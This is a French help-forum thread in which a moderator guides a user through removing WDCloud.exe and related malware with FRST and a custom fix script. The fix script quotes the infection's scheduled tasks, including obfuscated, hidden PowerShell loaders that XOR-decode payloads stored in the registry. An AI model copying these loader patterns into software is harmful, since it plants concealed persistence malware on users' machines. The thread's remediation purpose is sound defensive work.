Suppression du virus WDCloud.exe

Résolu
JA_2204 Messages postés 31 Statut Membre -  
bazfile Messages postés 58495 Date d'inscription   Statut Modérateur Dernière intervention   -

Bonjour,

Pouvez vous m'aider s'il vous plaît. Comment supprimer le virus WDCloud.exe?

Merci
Windows / Chrome 109.0.0.0

9 réponses

  1. bazfile Messages postés 58495 Date d'inscription   Statut Modérateur Dernière intervention   20 273
     

    Bonjour.

    Télécharge FRST une fois téléchargé enregistre-le sur le bureau puis clique avec le bouton droit de ta souris sur FRST et choisi Exécuter en tant qu'administrateur tu auras ceci :

    Clique sur Analyser


    Attention, attendre que les messages disant que l'analyse est terminée s'affichent.

    À la fin de l'analyse tu auras deux fichiers texte sur le bureau FRST et Addition.

    Ensuite envoie les rapports FRST et ADDITION sur PJJOINT voir CE TUTORIEL puis donne les deux liens générés par PJJOINT dans ta réponse.


    0
  2. bazfile Messages postés 58495 Date d'inscription   Statut Modérateur Dernière intervention   20 273
     

    Ton pc est très infecté (plusieurs infections) une fois qu'il sera désinfecté change tes mots de passe en ligne.

    Désinstalle Web Companion c'est un adware.

    Procédure à faire dans l'ordre indiqué :

    1- Ouvre FRST en tant qu'administrateur pour cela avec le bouton droit de ta souris sur FRST et choisis exécuter en tant qu'administrateur
    2 - Copie l'intégralité du script qui est dans l'encadré qui suit :

     
    Start::
    CreateRestorePoint:
    CloseProcesses:
    HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate: Restriction
    GroupPolicy-Firefox: Restriction 
    HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction 
    Task: {00357F93-12A0-4B15-8CF0-5ABC8ACDB918} - System32\Tasks\Microsoft\Windows\Management\Provisioning\User => powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\WINDOWS\System32\27ddf40c-a77f-4d38-a3d0-e147e380b313.ps1" 
    Task: {DB8356C9-464E-4021-AA71-162AD1CACA57} - System32\Tasks\Service\Diagnostic => C:\Users\Arivola\AppData\Roaming\ServiceGet\Moggur.exe -> "C:\Users\Arivola\AppData\Roaming\ServiceGet\Moggur.dat"  
    Task: {03D0211E-0D83-4AAD-B6DB-824A8A35942D} - System32\Tasks\Microsoft\Windows\Management\Provisioning\0WyVwgoPD\665457D4-0C18-4749-807A-9F0E02CFE410 => cmd.exe /C EChO IEx "iCm ([sCriPTbloCK]::CreATE([sTRinG]::JoIn('', ((Get-ItEMpROPeRty -PATH 'hKlM:\sofTwaRE\clASsES0WYVW').'0wYVwGo' | % { [chAr](`$_ -bXOR 184) }))))" | PoWERsHeLL -wIndowsTyLE hiDdEN
    Task: {EDA64E1D-FBD9-4939-9F6A-45D8C41A196A} - System32\Tasks\Microsoft\Windows\Management\Provisioning\qgtF2246P\8AAC84EA-7A8A-4AB0-B8D3-CD6F5D8AB010 => cmd.exe /C EchO IEX "iCM ([scRiPTBlocK]::crEaTE([StRiNG]::JOIN('', ((Get-iTemPrOPERtY -Path 'hkLm:\sOfTwaRE\CrEAtIVe TECHQgtF224').'qgtf2246p' | % { [Char](`$_ -BXoR 254) }))))" | pOWershELl -WINDowstYle HiDden 
    HKLM\...\Run: [] => [X]
    HKLM-x32\...\Run: [] => [X]
    Task: {30DE5B3A-784B-4203-BB02-2A56E1F939D5} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-3955518516-3450115232-410665834-1002Core => C:\Users\Arivola\AppData\Local\Google\Update\GoogleUpdate.exe /c (Pas de fichier)
    Task: {54016547-CBA9-4D72-AA97-B413B074F8CC} - System32\Tasks\GlaryOneClickOptimizer 5 => C:\Users\Arivola\AppData\Local\Temp\Rar$EXb0.156\_igetintopc.com_Glary_Utilities_Pro_5_Portable\App\GlaryUtilities5\OneClickMaintenance.exe /schedulestart (Pas de fichier)
    Task: {5C59A0D5-3A4A-44F6-8E8B-78EA842629D3} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-3955518516-3450115232-410665834-1002UA => C:\Users\Arivola\AppData\Local\Google\Update\GoogleUpdate.exe /ua /installsource scheduler (Pas de fichier)
    FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [Pas de fichier]
    U3 aspnet_state; pas de ImagePath
    Task: {37170938-AAA1-4101-9E74-2EBF2C25AC3B} - System32\Tasks\CnfCr0x121 => C:\Users\Arivola\AppData\Local\Google\Conf\v13-9\rnews.exe [28567952 2021-12-28] (SWN Software -> ) [Fichier non signé]
    Task: {38B84A90-C18D-43C7-BB3C-255F299DFF31} - System32\Tasks\VSPXService => C:\Users\Arivola\AppData\Roaming\YSPX\v3-21\rhc.exe [1536 2022-11-06] () [Fichier non signé]
    Task: {39E6ABA2-E64F-49A4-88F1-84DCB8CAA5A2} - System32\Tasks\CnfCr0x123 => C:\Users\Arivola\AppData\Local\Microsoft\Conf\v13-9\rnews.exe [28567952 2021-12-28] (SWN Software -> ) [Fichier non signé]
    Task: {57F8DDDF-67E9-4EA7-BF1B-CEE4F5BF5DFB} - System32\Tasks\VSPXService_LG => C:\Users\Arivola\AppData\Roaming\YSPX\v3-21\WDCloud.exe [66984712 2022-12-12] (APTX Software -> ) [Fichier non signé]
    Task: {5AF3DC07-0E8B-4F10-97EA-6404763A7A6D} - System32\Tasks\CnfCr0x122 => C:\Users\Arivola\AppData\Local\Mozilla\Conf\v13-9\rnews.exe [28567952 2021-12-28] (SWN Software -> ) [Fichier non signé]
    Task: {7794A4CF-0FF5-4164-8C64-838C05D9672C} - System32\Tasks\CnfCr0x124 => C:\Users\Arivola\AppData\Local\Media\Conf\v13-9\rnews.exe [28567952 2021-12-28] (SWN Software -> ) [Fichier non signé] [Fichier en cours d'utilisation]
    Task: {78143C93-CEE2-4111-B1C4-45B87DCAE123} - System32\Tasks\WD Elusion Service => C:\Users\Arivola\AppData\Local\WAAD\v2519\WDElua.exe [351616 2022-12-24] (APTX Software -> ) [Fichier non signé]
    Task: {9815C343-546D-48A6-8BB2-29EC6A0DFAE1} - System32\Tasks\CnfCr0x120 => C:\Users\Arivola\AppData\Local\Packages\Conf\v13-9\rnews.exe [28567952 2021-12-28] (SWN Software -> ) [Fichier non signé]
    Task: {A8785991-0120-46C3-AE52-D478FA095359} - System32\Tasks\ServiceGPUTaskUpdate => C:\Users\Arivola\AppData\Local\Packages\Conf\v13-9\rhc.exe [1536 2021-09-17] () [Fichier non signé]
    Task: {CB98B6E2-28AE-47BB-8EAB-E49EE96152EC} - System32\Tasks\APTXService => C:\Users\Arivola\AppData\Local\WAAD\v2519\rhc.exe [1536 2022-11-20] () [Fichier non signé]
    Task: {CC56E61E-E69E-430E-A98E-1C04200B4ADD} - System32\Tasks\CnfCr0x125 => C:\Users\Arivola\AppData\Local\Packages\Rnews\v13-9\rnews.exe [28567952 2021-12-28] (SWN Software -> ) [Fichier non signé]
    Task: {D77AFC3E-A6E4-4F57-BDAE-58BABB5240AD} - System32\Tasks\PxService => C:\Users\Arivola\AppData\Local\Packages\Paon\v1-5\paon.exe [13776272 2021-11-03] (PAN Software -> ) [Fichier non signé]
    Task: {306E1814-C312-496E-AFD1-972CC1B7220F} - System32\Tasks\APTXService_LG => Command(1): rhc.exe -> php.exe include.php
    Task: {306E1814-C312-496E-AFD1-972CC1B7220F} - System32\Tasks\APTXService_LG => Command(2): rhc.exe -> php.exe index.php
    ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> Pas de fichier
    ContextMenuHandlers6-x32: [Glary Utilities] -> {B3C418F8-922B-4faf-915E-59BC14448CF7} => C:\Program Files (x86)\Glary Utilities 5\ContextHandler.dll -> Pas de fichier
    AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxlctlfudivq`qsp`20hfm [0]
    CHR HKLM-x32\...\Chrome\Extension: [aegnopegbbhjeeiganiajffnalhlkkjb]
    CHR HKLM-x32\...\Chrome\Extension: [makcojoppodhcgmmchohadhpkicoafka]
    C:\Users\Arivola\AppData\Local\Packages\Paon
    C:\Users\Arivola\AppData\Local\Packages\Rnews
    C:\Users\Arivola\AppData\Local\Packages\Conf\v13-9
    C:\Users\Arivola\AppData\Local\WAAD
    C:\Users\Arivola\AppData\Local\Media\Conf\v13-9
    C:\Users\Arivola\AppData\Local\Google\Conf\v13-9
    C:\Users\Arivola\AppData\Local\Mozilla\Conf\v13-9
    C:\Users\Arivola\AppData\Roaming\YSPX
    C:\Users\Arivola\AppData\Roaming\ServiceGet\Moggur.dat
    C:\WINDOWS\System32\27ddf40c-a77f-4d38-a3d0-e147e380b313.ps1
    cmd: netsh advfirewall reset
    EmptyTemp:
    End::

    3- Une fois le script copié clique sur Corriger, FRST prend automatiquement le script qui est dans le presse-papier.
     


    Laisse la correction se faire une fois qu'elle est terminée il te sera demandé de redémarrer ton pc, fait-le dès que cela te sera demandé, voir ci-dessous.

    Puis une fois ton ordinateur redémarré :
    4- Tu auras un fichier Fixlog sur ton bureau ensuite envoie ce rapport fixlog sur PJJOINT puis donne le lien généré par PJJOINT dans ta réponse.

    5- VÉRIFIE ET DIS-MOI SI TON PROBLÈME EST TOUJOURS PRÉSENT

    6- Pour voir si tout est OK fait une nouvelle analyse FRST et donne les liens des deux rapports.


    0
  3. JA_2204
     

    Me revoilà

    J'ai un petit problème, FRST ne répond pas lors de la suppression de fichier temporaire dans C:\Users\Arivola\AppData\local\Temp, je ne sais pas pourquoi. Le fichier Fixlog est là mais la correction n'est pas encore terminée. Du coup là je suis coincé.

    0
    1. bazfile Messages postés 58495 Date d'inscription   Statut Modérateur Dernière intervention   20 273
       

      N'ouvre pas le fichier fixlog, il doit y avoir beaucoup de fichiers temporaires à supprimer attend que le processus se termine et que le redémarrage du pc te soit demandé.

      0
  4. Vous n’avez pas trouvé la réponse que vous recherchez ?

    Posez votre question
  5. JA_2204
     

    Je t'envoie le lien du fichier Fixlog.txt

    https://pjjoint.malekal.com/files.php?id=20230212_b14o8b6u15x12

    0
    1. bazfile Messages postés 58495 Date d'inscription   Statut Modérateur Dernière intervention   20 273
       

      Tu as recommencé trois fois la correction FRST, ça il ne faut pas le faire, les infections sont supprimées.

      Fait une nouvelle analyse FRST et donne les liens des rapports.

      0
  6. bazfile Messages postés 58495 Date d'inscription   Statut Modérateur Dernière intervention   20 273
     

    Il n'y a plus d'infection sur ton pc.

    Si tout est OK pour toi, désinstalle FRST, renomme le fichier FRST que tu as téléchargé, renomme-le en uninstall, puis une fois le fichier renommé ouvre-le, la désinstallation se fera automatiquement via un redémarrage du pc.


    0
  7. JA_2204
     

    Ok merci beaucoup

    La boulette que j'ai faite ne va pas causé des problèmes?

    0
    1. bazfile Messages postés 58495 Date d'inscription   Statut Modérateur Dernière intervention   20 273
       

      Non.

      0
  8. JA_2204
     

    Merci pour tout alors, tu es super

    0
    1. bazfile Messages postés 58495 Date d'inscription   Statut Modérateur Dernière intervention   20 273
       

      De rien. :)

      @+ sur CCM.

      1